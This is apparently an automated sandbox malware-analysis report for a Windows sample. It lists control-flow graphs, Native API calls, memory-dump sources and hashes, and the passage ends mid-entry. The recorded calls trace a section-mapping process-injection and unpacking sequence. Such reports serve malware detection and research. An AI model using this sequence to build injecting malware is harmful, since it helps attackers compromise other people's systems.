                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
                            • Instruction ID: 81614cc47252d4ee750cd10e5f363bec598540b14c8849c2392ba6a7819565d6
                            • Opcode Fuzzy Hash: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
                            • Instruction Fuzzy Hash: 8B5137B1900248BFEF209F91CC49FEFBBB8EF85B00F144159FA11BA2A5D6759905CB24

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 232 401553-40156b call 401196 238 401570-401575 232->238 239 40156d 232->239 241 40157b-40158c 238->241 242 40189d-4018a5 238->242 239->238 245 401592-4015bb 241->245 246 40189b-4018bf 241->246 242->238 245->246 254 4015c1-4015d8 NtDuplicateObject 245->254 250 4018b0-4018bb 246->250 251 4018c2-4018d4 246->251 250->251 255 4018d7 251->255 256 4018ca-4018d0 251->256 254->246 257 4015de-401602 NtCreateSection 254->257 258 4018eb 255->258 259 4018df-4018f7 call 401196 255->259 256->255 261 401604-401625 NtMapViewOfSection 257->261 262 40165e-401684 NtCreateSection 257->262 258->259 261->262 264 401627-401643 NtMapViewOfSection 261->264 262->246 265 40168a-40168e 262->265 264->262 267 401645-40165b 264->267 265->246 268 401694-4016b5 NtMapViewOfSection 265->268 267->262 268->246 269 4016bb-4016d7 NtMapViewOfSection 268->269 269->246 271 4016dd call 4016e2 269->271
                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
                            • Instruction ID: d0bd6428bf20664bceabbb55207a57fb76a02318494b8c1f9a1cb2173d989cf6
                            • Opcode Fuzzy Hash: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
                            • Instruction Fuzzy Hash: 565128B1900249BBEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D7719941CB24

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 273 402fd3-402ff7 274 40312a-40312f 273->274 275 402ffd-403015 273->275 275->274 276 40301b-40302c 275->276 277 40302e-403037 276->277 278 40303c-40304a 277->278 278->278 279 40304c-403053 278->279 280 403075-40307c 279->280 281 403055-403074 279->281 282 40309e-4030a1 280->282 283 40307e-40309d 280->283 281->280 284 4030a3-4030a6 282->284 285 4030aa 282->285 283->282 284->285 286 4030a8 284->286 285->277 287 4030ac-4030b1 285->287 286->287 287->274 288 4030b3-4030b6 287->288 288->274 289 4030b8-403127 RtlCreateUserThread NtTerminateProcess 288->289 289->274
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: CreateProcessTerminateThreadUser
                            • String ID:
                            • API String ID: 1921587553-0
                            • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                            • Instruction ID: c5f1771b03d6f6f48bc893f8c69e4bd59083146a95f7f1e574921d9c63f51eee
                            • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                            • Instruction Fuzzy Hash: 9A412631218E088FD768EE6CA84576277D5FB98311F6643AAE809D3389FE34DC1183C9

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 291 403149-40314e 292 403150-403151 291->292 293 403152-403156 291->293 292->293 294 403157-403172 293->294 295 4030fe-403127 RtlCreateUserThread NtTerminateProcess 293->295 299 403174 294->299 296 40312a-40312f 295->296 300 403176 299->300 301 40317d-403182 299->301 300->301 302 403178 300->302 303 403184 301->303 304 40318a-403192 call 40120f 301->304 302->301 303->304 305 403186-403189 303->305 304->299 308 403196-4031ac 304->308 305->304 311 4031b0 308->311 311->311
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
                            • Instruction ID: 15e76b100028984b8ee99d2dec5c44828c89a921298bb6101f651bfb9f41234e
                            • Opcode Fuzzy Hash: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
                            • Instruction Fuzzy Hash: 6F0128315186048BE7285E799886226BFA5EF18337F28037FD122E87D1E13E8707964F

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 312 65eac0-65ead9 313 65eadb-65eadd 312->313 314 65eae4-65eaf0 CreateToolhelp32Snapshot 313->314 315 65eadf 313->315 316 65eb00-65eb0d Module32First 314->316 317 65eaf2-65eaf8 314->317 315->314 318 65eb16-65eb1e 316->318 319 65eb0f-65eb10 call 65e77f 316->319 317->316 324 65eafa-65eafe 317->324 322 65eb15 319->322 322->318 324->313 324->316
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0065EAE8
                            • Module32First.KERNEL32(00000000,00000224), ref: 0065EB08
                            Memory Dump Source
                            • Source File: 00000000.00000002.1769088650.000000000065B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0065B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_65b000_n72I7qB2ss.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFirstModule32SnapshotToolhelp32
                            • String ID:
                            • API String ID: 3833638111-0
                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                            • Instruction ID: ff598abdde68f1b54279205c5ab36a24b5576781b2485dad03e6972e8461347a
                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                            • Instruction Fuzzy Hash: 59F0C2312007106BDB242AF4998CAAE72EDAF48326F100528EA43911C0DB71E9098661

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 60 5d003c-5d0047 61 5d004c-5d0263 call 5d0a3f call 5d0e0f call 5d0d90 VirtualAlloc 60->61 62 5d0049 60->62 77 5d028b-5d0292 61->77 78 5d0265-5d0289 call 5d0a69 61->78 62->61 79 5d02a1-5d02b0 77->79 81 5d02ce-5d03c2 VirtualProtect call 5d0cce call 5d0ce7 78->81 79->81 82 5d02b2-5d02cc 79->82 89 5d03d1-5d03e0 81->89 82->79 90 5d0439-5d04b8 VirtualFree 89->90 91 5d03e2-5d0437 call 5d0ce7 89->91 93 5d04be-5d04cd 90->93 94 5d05f4-5d05fe 90->94 91->89 95 5d04d3-5d04dd 93->95 96 5d077f-5d0789 94->96 97 5d0604-5d060d 94->97 95->94 99 5d04e3-5d0505 95->99 100 5d078b-5d07a3 96->100 101 5d07a6-5d07b0 96->101 97->96 102 5d0613-5d0637 97->102 111 5d0517-5d0520 99->111 112 5d0507-5d0515 99->112 100->101 104 5d086e-5d08be LoadLibraryA 101->104 105 5d07b6-5d07cb 101->105 106 5d063e-5d0648 102->106 110 5d08c7-5d08f9 104->110 108 5d07d2-5d07d5 105->108 106->96 109 5d064e-5d065a 106->109 113 5d0824-5d0833 108->113 114 5d07d7-5d07e0 108->114 109->96 115 5d0660-5d066a 109->115 116 5d08fb-5d0901 110->116 117 5d0902-5d091d 110->117 118 5d0526-5d0547 111->118 112->118 122 5d0839-5d083c 113->122 119 5d07e4-5d0822 114->119 120 5d07e2 114->120 121 5d067a-5d0689 115->121 116->117 123 5d054d-5d0550 118->123 119->108 120->113 124 5d068f-5d06b2 121->124 125 5d0750-5d077a 121->125 122->104 126 5d083e-5d0847 122->126 128 5d0556-5d056b 123->128 129 5d05e0-5d05ef 123->129 130 5d06ef-5d06fc 124->130 131 5d06b4-5d06ed 124->131 125->106 132 5d0849 126->132 133 5d084b-5d086c 126->133 134 5d056d 128->134 135 5d056f-5d057a 128->135 129->95 136 5d06fe-5d0748 130->136 137 5d074b 130->137 131->130 132->104 133->122 134->129 139 5d057c-5d0599 135->139 140 5d059b-5d05bb 135->140 136->137 137->121 144 5d05bd-5d05db 139->144 140->144 144->123
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005D024D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768940641.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5d0000_n72I7qB2ss.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocVirtual
                            • String ID: cess$kernel32.dll
                            • API String ID: 4275171209-1230238691
                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                            • Instruction ID: fc9b128c1f50d28fefb36c0545add9695854d6336b218cbceaeb3d9a397e2676
                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                            • Instruction Fuzzy Hash: 7D526A74A01229DFDB64CF58C985BA8BBB1BF09314F1480DAE94DAB351DB30AE85DF14

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 325 5d0e0f-5d0e24 SetErrorMode * 2 326 5d0e2b-5d0e2c 325->326 327 5d0e26 325->327 327->326
                            APIs
                            • SetErrorMode.KERNELBASE(00000400,?,?,005D0223,?,?), ref: 005D0E19
                            • SetErrorMode.KERNELBASE(00000000,?,?,005D0223,?,?), ref: 005D0E1E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768940641.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5d0000_n72I7qB2ss.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                            • Instruction ID: c5d6d6fa0513ea3056317b239f3eb2f6e5cae715dba88dd75ef451771bbf1679
                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                            • Instruction Fuzzy Hash: 47D0123114512877D7102A94DC09BCD7F1CDF05B62F008412FB0DD9180C770994046E5

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 328 423467-423484 VirtualProtect
                            APIs
                            • VirtualProtect.KERNELBASE(00000040,?,?,?,00423A9B), ref: 0042347D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768787533.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_416000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 9dbbffbc3c54b5c3a63e2c751ae658eddfc00eafb6b082af4fefa63f7fa846a4
                            • Instruction ID: cd11079ae9fe1b66df236ae7ddbd13e2ea7dadf25881c3163ba94d66086d63c1
                            • Opcode Fuzzy Hash: 9dbbffbc3c54b5c3a63e2c751ae658eddfc00eafb6b082af4fefa63f7fa846a4
                            • Instruction Fuzzy Hash: 5CC08CB1140109FFCF018B81EC06E593BADE300308F001131B701A1070C271AA21AB1D

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 329 40192a-40195e call 401196 Sleep call 40141a 338 401960-401968 call 401513 329->338 339 40196d-4019b8 call 401196 329->339 338->339
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
                            • Instruction ID: c9f3fcf8bcf4793f4e93774b1f3aea48b9d62e180a47635587c881d01dd95fe5
                            • Opcode Fuzzy Hash: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
                            • Instruction Fuzzy Hash: 44118BB520C204EBEB006A949C61EBA33689B41324F308033FA537A1F1C53D9A13F66F

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 353 4018fa-40195e call 401196 Sleep call 40141a 367 401960-401968 call 401513 353->367 368 40196d-4019b8 call 401196 353->368 367->368
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                              • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                              • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: CreateDuplicateObjectSectionSleep
                            • String ID:
                            • API String ID: 4152845823-0
                            • Opcode ID: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
                            • Instruction ID: b7e75c0626d3bb27724d4ec46791fa532c83bfb7d8b633e26b51f8edd18e17c4
                            • Opcode Fuzzy Hash: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
                            • Instruction Fuzzy Hash: 8D0169F520C204EBEB006A959C61E7A32A89B40314F308433BA53791F1D57D9A13F66F

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 382 401906-40195e call 401196 Sleep call 40141a 394 401960-401968 call 401513 382->394 395 40196d-4019b8 call 401196 382->395 394->395
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                              • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                              • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: CreateDuplicateObjectSectionSleep
                            • String ID:
                            • API String ID: 4152845823-0
                            • Opcode ID: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
                            • Instruction ID: d22cbc81ffad1bf36218d88fcd010809f3a6372a226c5372991517933d0026e7
                            • Opcode Fuzzy Hash: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
                            • Instruction Fuzzy Hash: B0018CB5608100EBEB005AA18861BBA33A89B55310F308537FA53791F5C53D9A13EB2F

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 409 401937-40193b 410 401925-401939 409->410 411 40193c-40195e call 401196 Sleep call 40141a 409->411 410->411 420 401960-401968 call 401513 411->420 421 40196d-4019b8 call 401196 411->421 420->421
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
                            • Instruction ID: 58f7e284f65f0deed68c1957b19a6c9fa897bc81c1ad5f596fd0fc14cb75afb8
                            • Opcode Fuzzy Hash: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
                            • Instruction Fuzzy Hash: 15018FB6608204E7EB005A94D861EBA32289B41321F208137FA23791F5C53D8A13E76B

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 435 401926-40195e call 401196 Sleep call 40141a 446 401960-401968 call 401513 435->446 447 40196d-4019b8 call 401196 435->447 446->447
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                              • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                              • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: CreateDuplicateObjectSectionSleep
                            • String ID:
                            • API String ID: 4152845823-0
                            • Opcode ID: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
                            • Instruction ID: 96766bc7df1ac7ff96305ad3f9c1d052b76615a330d402c70b0abf72a80acf22
                            • Opcode Fuzzy Hash: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
                            • Instruction Fuzzy Hash: 40014BB5208105E7EB006E959861EBA33689B45314F308533BA53791F1C53D8A13FB2F
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0065E7D0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1769088650.000000000065B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0065B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_65b000_n72I7qB2ss.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                            • Instruction ID: 1cd655e2372a05dade006ac7480a72809c04cb43afa921d36d0cdc4970f7b7a0
                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                            • Instruction Fuzzy Hash: F3113F79A00208EFDB01DF98C985E98BFF5AF08351F158094F9489B361D371EA54DF90
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                              • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                              • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: CreateDuplicateObjectSectionSleep
                            • String ID:
                            • API String ID: 4152845823-0
                            • Opcode ID: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
                            • Instruction ID: c6131c3a50a378ccb7249bf603a143f64ac18458d27712ce8a7102c0a8bf1339
                            • Opcode Fuzzy Hash: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
                            • Instruction Fuzzy Hash: 03011DB5208105E7EB006E95D861E7E33699B44315F308537BA53791F5C63D8A13E72F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768940641.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5d0000_n72I7qB2ss.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: .$GetProcAddress.$l
                            • API String ID: 0-2784972518
                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                            • Instruction ID: f1d2a22214cb9c96db2cb5e2ffd4a563243a465545b93e2a2a3d4146318cd5f1
                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                            • Instruction Fuzzy Hash: D33117B6900609DFDB20CF99C884BAEBBF5FB48324F25504BD441A7351D771AA45CBA4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID: s
                            • API String ID: 0-453955339
                            • Opcode ID: 48b5a33bbdd50b45eb453c1d37d8e20c69ec5ddfc5d0edf0d29e9f7813fff47f
                            • Instruction ID: faf3b076d3936fe534238131b1011e071e18fe1312d7afc810a3a82cd15f20a9
                            • Opcode Fuzzy Hash: 48b5a33bbdd50b45eb453c1d37d8e20c69ec5ddfc5d0edf0d29e9f7813fff47f
                            • Instruction Fuzzy Hash: FA31776251C6819FD3160F654825A667F686B43313B2900FFC442BE2E3D63D8A06939F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1769088650.000000000065B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0065B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_65b000_n72I7qB2ss.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: /e
                            • API String ID: 0-2837373609
                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                            • Instruction ID: db6c650b3de7a28d5a047664bd9819730d8fba9b1a84f7ed854550b9eb1537ff
                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                            • Instruction Fuzzy Hash: F5118E72340100AFDB48DF55DCC1EA673EAFB88321B298069ED08CB312E676ED42C760
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID: j1
                            • API String ID: 0-4002328062
                            • Opcode ID: 4efd56776a1cf48e51d5b8b28f3c88fced1d5df91a33fef9abe88d0c8160b6dd
                            • Instruction ID: 7ffeeb59c018ebe80191c9150d7c44a1840aee0603b3a4286ce7f0937f8dfb2f
                            • Opcode Fuzzy Hash: 4efd56776a1cf48e51d5b8b28f3c88fced1d5df91a33fef9abe88d0c8160b6dd
                            • Instruction Fuzzy Hash: 1EF0287808838899CB02AF36C755B99FF31BF87335F78469ED9962A392C6200649C760
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1a27345af654d8e993b371437472085dc99020dacbb88babffce4e4e1de5afcb
                            • Instruction ID: 0881589c7ff5ff5768f2d8d6c75c742b5463282b0ed343a47442533531e174b2
                            • Opcode Fuzzy Hash: 1a27345af654d8e993b371437472085dc99020dacbb88babffce4e4e1de5afcb
                            • Instruction Fuzzy Hash: 1D110A3A449345D9C60155278B4AB6BFB707A53730B308667D257267E18979028AE337
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7679fe5b6e44f9d9bc89cc9259ef9fe0df295a63758788235af8aeaec9500c5a
                            • Instruction ID: 5e4278b07ce3c8393ea1c67bbc9533801249a46e55f2d55876e4d3ceabbd52a2
                            • Opcode Fuzzy Hash: 7679fe5b6e44f9d9bc89cc9259ef9fe0df295a63758788235af8aeaec9500c5a
                            • Instruction Fuzzy Hash: 3F016174049348D9D7016A36DB4DBA7BB21BB43320F30826BD707352C2C9B4054BE367
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 55f04470bba513d6a1ff85116eb4bd7e5a7bfe650738b85bdc777e345750bb4e
                            • Instruction ID: 5e560d39f8138ce68ee94cfd6023eaf6832ac934b81d0532f16e67c5e36192ac
                            • Opcode Fuzzy Hash: 55f04470bba513d6a1ff85116eb4bd7e5a7bfe650738b85bdc777e345750bb4e
                            • Instruction Fuzzy Hash: 80018E340493848ECB029B35C71A7A9FF71BF93335F34819FC5571A6E2C6240209D751
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768940641.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5d0000_n72I7qB2ss.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                            • Instruction ID: 33b62e3fa8d9d576bc60db09173d9c203964da0be1d618487df522382980e989
                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                            • Instruction Fuzzy Hash: 8D01A7766006048FDF31DF68C804BAB37FAFB85316F4544ABD506973C2E774A9418B90
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6f6600757ac2f7f113cd3111149c0096a045daac26c52c0a983afeb1d7d6023c
                            • Instruction ID: fce5d5c764085920edf89c5c9efb60a7985776bdb309a80537f9fa9cbbd5f206
                            • Opcode Fuzzy Hash: 6f6600757ac2f7f113cd3111149c0096a045daac26c52c0a983afeb1d7d6023c
                            • Instruction Fuzzy Hash: 5DF04E7408834499DB416A36C7457A9FB21BF83320F34825FD547256D2CA74054AE711
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a78d0ae9cedb3364fca3541f3adf29928ee5114118790e41c8b89e96890051af
                            • Instruction ID: 9ff9efdcd1480cc8040ea01fdd64be9b4a39a154ba86f8cede482a75e84e4065
                            • Opcode Fuzzy Hash: a78d0ae9cedb3364fca3541f3adf29928ee5114118790e41c8b89e96890051af
                            • Instruction Fuzzy Hash: 36F02B7804574859CB02AF37C7416D9FF31BE83235F74464ED4561A392C720060DC760
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fb15b2d9d84d8bcf95237442851c33c9a576287e722d5cdf4983b928f5d9cc64
